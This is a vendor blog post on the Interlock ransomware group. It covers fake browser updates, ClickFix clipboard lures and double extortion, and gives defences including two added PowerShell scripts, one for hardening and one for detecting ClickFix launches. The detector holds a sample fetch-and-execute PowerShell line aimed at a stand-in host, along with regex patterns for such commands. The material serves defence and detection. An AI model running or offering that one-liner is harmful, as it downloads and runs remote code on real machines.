Interlock Ransomware: A Dangerous Double Extortion Threat

Publication date: Dec 15, 2025

Last Published: Dec 15, 2025


When the FBI and CISA issue a joint cybersecurity advisory about a single ransomware group, organizations should pay attention. That’s exactly what happened in July 2025 with the #StopRansomware advisory on Interlock (AA25-203A), a threat first observed in late September 2024 that has since claimed a large number of victims, including major healthcare providers, city governments, and defense contractors. Despite being around for over a year, it remains highly effective because it relies on entry points that many organizations still haven’t secured: compromised websites and social engineering that gets users to run commands themselves, rather than the phishing attachments most defenses are tuned for. 

What Makes Interlock So Dangerous  

Most ransomware arrives through phishing emails containing malicious attachments or deceptive links, but not Interlock.  

Instead of sending suspicious emails, attackers compromise websites that people already trust, such as local news sites, small business pages, or community forums, and inject malicious code. When someone visits, they see what looks like a routine browser update prompt for Chrome or Edge (later campaigns have also imitated VPN and security clients such as FortiClient, Ivanti Secure Access Client, and GlobalProtect). Click to download and run the “update,” and you’ve just installed the initial malware. This technique is known as a drive-by download, and the FBI specifically noted it’s “uncommon among ransomware groups.” 

Interlock also uses a social engineering trick called ClickFix. A user visits a compromised website and sees what appears to be a CAPTCHA verification or an error message claiming something needs to be fixed. The page’s script has already copied a command to the clipboard, and the page instructs the user to open the Windows Run dialog (Win+R), paste, and press Enter. The pasted line typically calls PowerShell or mshta.exe to fetch and run a payload from an attacker-controlled server. Because the browser never downloads a file, attachment scanners and download filters see nothing, and the malicious code runs from the user’s own session under a legitimate, signed Windows interpreter. That is why many security tools don’t flag it. 

Once inside, Interlock operators take their time. Researchers have documented dwell times averaging around 17 days between initial access and ransomware deployment. Here’s what happens during that window:  

  1. Establish persistence: Attackers embed themselves in the system using scheduled tasks and registry Run keys so they keep access even after a reboot. 
  2. Harvest credentials: Using a keylogger and commodity stealer malware, they capture passwords and browser session data and gain access to additional accounts, especially those belonging to administrators. 
  3. Move laterally: They spread through the network via Remote Desktop Protocol and remote access tools such as AnyDesk to reach servers, backup systems, and domain controllers. 
  4. Steal data: Before encrypting anything, attackers exfiltrate sensitive files to cloud storage they control, using legitimate tools such as Azure Storage Explorer and AzCopy that blend in with normal business traffic. 
  5. Deploy ransomware: Only after stealing what they need do they disable security tools, delete backups, encrypt the target systems, and demand a ransom in exchange for decryption. 

Even if you have reliable backups and can restore operations quickly, attackers can threaten to publish your stolen data unless you pay. The combination of data theft and encryption is known as double extortion, and it’s why some organizations pay the ransom even when their backups would let them recover the data on their own. The potential for regulatory fines, lawsuits, and reputational damage from leaked customer or employee data can far exceed the ransom demand itself. 

How to Protect Your Organization from Interlock 

Because Interlock relies on tricking users rather than exploiting software vulnerabilities, defense must start with people. But even well-trained employees make mistakes, especially when attackers use highly sophisticated methods. That’s why a strong defense requires multiple layers. When one fails, others can still stop the attack.  

Security Awareness Training 

Employees need to understand the specific tactics Interlock uses, so training should cover how to recognize fake browser update prompts, why they should never paste commands into the Windows Run dialog regardless of what a website tells them, and how ClickFix attacks disguise themselves as routine CAPTCHAs or error messages. CISA recommends making this training ongoing rather than a one-time event, since attack methods evolve constantly. 

Restricting Risky System Features 

Disabling the Windows Run dialog through Group Policy (“Remove Run menu from Start Menu”) removes the most common ClickFix execution path, but not the only one: lures also direct victims to the File Explorer address bar, Windows Terminal, or the Win+X PowerShell shortcut. Pair it with application control (AppLocker or Windows Defender Application Control) that limits which users can launch PowerShell, mshta.exe, and other script hosts at all. Restricting PowerShell to signed scripts helps less than it sounds: the execution policy is a safety feature, not a security boundary, and a pasted command that includes -ExecutionPolicy Bypass ignores it. Turn on PowerShell script block logging and command-line auditing as well, so that when a user does fall for the lure, the full command they ran is recorded for detection and response. 
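The hardening above, as an added example that is not part of the original post or of any CISA/FBI guidance. It assumes an elevated PowerShell on a Windows 10/11 host and writes the same registry values the named Group Policy settings would write; the NoRun value is placed under HKLM so it applies to every profile on the machine (the User Configuration GPO writes the same value under HKCU). The report function exists so the result can be checked on a pilot host before the settings go into a GPO.

```powershell
#Requires -RunAsAdministrator
# Added example (not the article's or CISA's code). Assumes Windows 10/11 and an
# elevated session; registry paths mirror the Group Policy settings in comments.

function Set-ClickFixHardening {
    # 1. "Remove Run menu from Start Menu" (User Configuration > Administrative
    #    Templates > Start Menu and Taskbar). NoRun=1 under HKLM blocks Win+R
    #    for all users. It does NOT block the Explorer address bar or Terminal.
    $explorerPolicy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    New-Item -Path $explorerPolicy -Force | Out-Null
    Set-ItemProperty -Path $explorerPolicy -Name NoRun -Value 1 -Type DWord

    # 2. PowerShell script block logging (Event ID 4104). Blocks nothing, but
    #    records the de-obfuscated script a pasted ClickFix one-liner executes,
    #    which is what EDR rules and incident responders need to see.
    $sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # 3. Require signed scripts. Execution policy is not a security boundary:
    #    "powershell -ep bypass" or "iex (iwr ...)" ignores it. Enforce with
    #    AppLocker/WDAC; this only removes the laziest path.
    Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy AllSigned -Force
}

function Test-ClickFixHardening {
    # Small report for verifying a pilot host before rolling out via GPO.
    $explorerPolicy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    $sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    [pscustomobject]@{
        RunDialogDisabled  = (Get-ItemProperty -Path $explorerPolicy -Name NoRun -ErrorAction SilentlyContinue).NoRun -eq 1
        ScriptBlockLogging = (Get-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
        ExecutionPolicy    = Get-ExecutionPolicy -Scope LocalMachine
    }
}

Set-ClickFixHardening
Test-ClickFixHardening
```

Users may need to sign out and back in before Explorer honors the NoRun change. Treat the three settings as a floor: the control that actually stops a pasted command from running is application control over the script hosts, which this script does not configure.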

Endpoint Detection and Response (EDR) 

Since Interlock operators use legitimate remote access tools like AnyDesk and built-in Windows utilities to move through networks, signature-based antivirus often misses them. Endpoint Detection and Response (EDR) solutions monitor behavior rather than just scanning for known malware signatures, so they can flag things like explorer.exe spawning a hidden PowerShell window that downloads code, a scheduled task created by a user who has never created one, an unfamiliar connection to an external server, or an unusual spike in file access and rename operations. Make sure command-line auditing and PowerShell script block logging are on, so the EDR (and your responders) can see the full command that was pasted rather than just that PowerShell ran. 
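What that behavioral check looks like for the ClickFix path described above, as an added example that is not the article’s or any EDR vendor’s code. It assumes process-creation telemetry with ParentImage, Image, and CommandLine fields (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled) already projected into objects; the three sample events are constructed for the demo, and the hostnames, users, and URLs in them are invented.

```powershell
# Added example (not the article's code). Assumes process-creation events with
# ParentImage / Image / CommandLine fields (Sysmon ID 1 or Security 4688).

function Find-ClickFixProcess {
    param([Parameter(ValueFromPipeline)] $Event)
    process {
        $parent = [IO.Path]::GetFileName([string]$Event.ParentImage).ToLower()
        $child  = [IO.Path]::GetFileName([string]$Event.Image).ToLower()
        $cmd    = [string]$Event.CommandLine

        # Win+R runs the pasted line as a child of explorer.exe; the Windows
        # Terminal variant of the lure shows up under WindowsTerminal.exe.
        $launchers    = 'explorer.exe', 'windowsterminal.exe'
        # Interpreters ClickFix lures hand the pasted one-liner to.
        $interpreters = 'powershell.exe', 'pwsh.exe', 'mshta.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe'
        if ($launchers -notcontains $parent -or $interpreters -notcontains $child) { return }

        # Tokens typical of a pasted dropper: hidden window, policy bypass,
        # encoded command, fetch-and-eval, remote HTA, or the "I am not a
        # robot" trailing comment lures append so the Run box looks like a
        # CAPTCHA step. -match is case-insensitive by default.
        $patterns = @(
            '-w(indowstyle)?\s+h(idden)?',
            '-e(ncodedcommand|c|nc)?\s+[A-Za-z0-9+/=]{20,}',
            '\b(iex|invoke-expression)\b',
            '\b(downloadstring|invoke-webrequest|iwr|curl)\b',
            '-e(xecutionpolicy|p)\s+bypass',
            'mshta(\.exe)?\s+https?://',
            'i am not a robot|captcha|verification id'
        )
        $hits = @($patterns | Where-Object { $cmd -match $_ })
        if ($hits.Count -ge 1) {
            [pscustomobject]@{
                Computer    = $Event.Computer
                User        = $Event.User
                Parent      = $parent
                Child       = $child
                Matches     = $hits.Count
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample telemetry: a ClickFix-style launch from the Run dialog,
# an ordinary PowerShell launch from Run, and an unrelated build-agent process.
$sample = @(
    [pscustomobject]@{ Computer='WS-042'; User='CORP\jdoe'
        ParentImage='C:\Windows\explorer.exe'
        Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine='powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/verify)" # I am not a robot - reCAPTCHA Verification ID: 7391' },
    [pscustomobject]@{ Computer='WS-042'; User='CORP\jdoe'
        ParentImage='C:\Windows\explorer.exe'
        Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine='powershell' },
    [pscustomobject]@{ Computer='BLD-01'; User='CORP\svc-build'
        ParentImage='C:\Program Files\Git\usr\bin\bash.exe'
        Image='C:\Windows\System32\cmd.exe'
        CommandLine='cmd /c curl -o build.zip https://artifacts.example.invalid/build.zip' }
)

# Only the first event is reported: the second has no suspicious tokens and the
# third is not launched from a user shell.
$sample | Find-ClickFixProcess | Format-List
```

The parent-process condition is what keeps this rule quiet: the same tokens appear in legitimate automation all day, but a hidden, policy-bypassing PowerShell whose parent is explorer.exe is a user pasting something they were told to paste. To run it against real data, read Sysmon events with Get-WinEvent, pull ParentImage, Image, and CommandLine out of each event’s XML, and pipe the resulting objects in.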

Multi-Factor Authentication (MFA) 

Multi-Factor Authentication (MFA) remains one of the most effective defenses against stolen credentials being reused. Even if attackers harvest passwords through keyloggers, MFA on remote access points (VPN, RDP gateways), email, and administrative accounts creates an additional barrier they must overcome by requiring a second form of verification, preferably a phishing-resistant one such as a FIDO2 security key. One caveat: the stealer malware Interlock deploys also takes browser session cookies, which can let attackers into already-authenticated web sessions without a second factor, so pair MFA with short session lifetimes and the ability to revoke sessions when a workstation is suspected compromised. 

Network Segmentation 

Segmentation limits how far attackers can spread once inside. If your accounting department’s systems are isolated from your production servers, compromising one employee’s workstation doesn’t automatically give access to your entire infrastructure. Restrict RDP and remote management tools to designated admin hosts rather than allowing them workstation-to-workstation. This also applies to backups, which should be kept offline or immutable on separate systems that can’t be reached or deleted with the same credentials attackers harvest from the domain. 

Incident Response Planning 

Finally, assume that despite your best efforts, an incident could still happen. Having an incident response plan that specifically addresses ransomware (who to call, how to isolate affected systems, when to contact law enforcement) is essential for avoiding costly response mistakes at the worst possible time.  

Conclusion 

Interlock isn’t going away, and the tactics it uses will only become more common as other ransomware groups adopt similar methods. The good news is that the defenses outlined above work. The challenge for most small and medium businesses is implementing them consistently across the organization while keeping up with day-to-day operations. That’s where we at OSIbeyond can help. Schedule a meeting with our team to assess where your organization stands and what it would take to close the gaps.
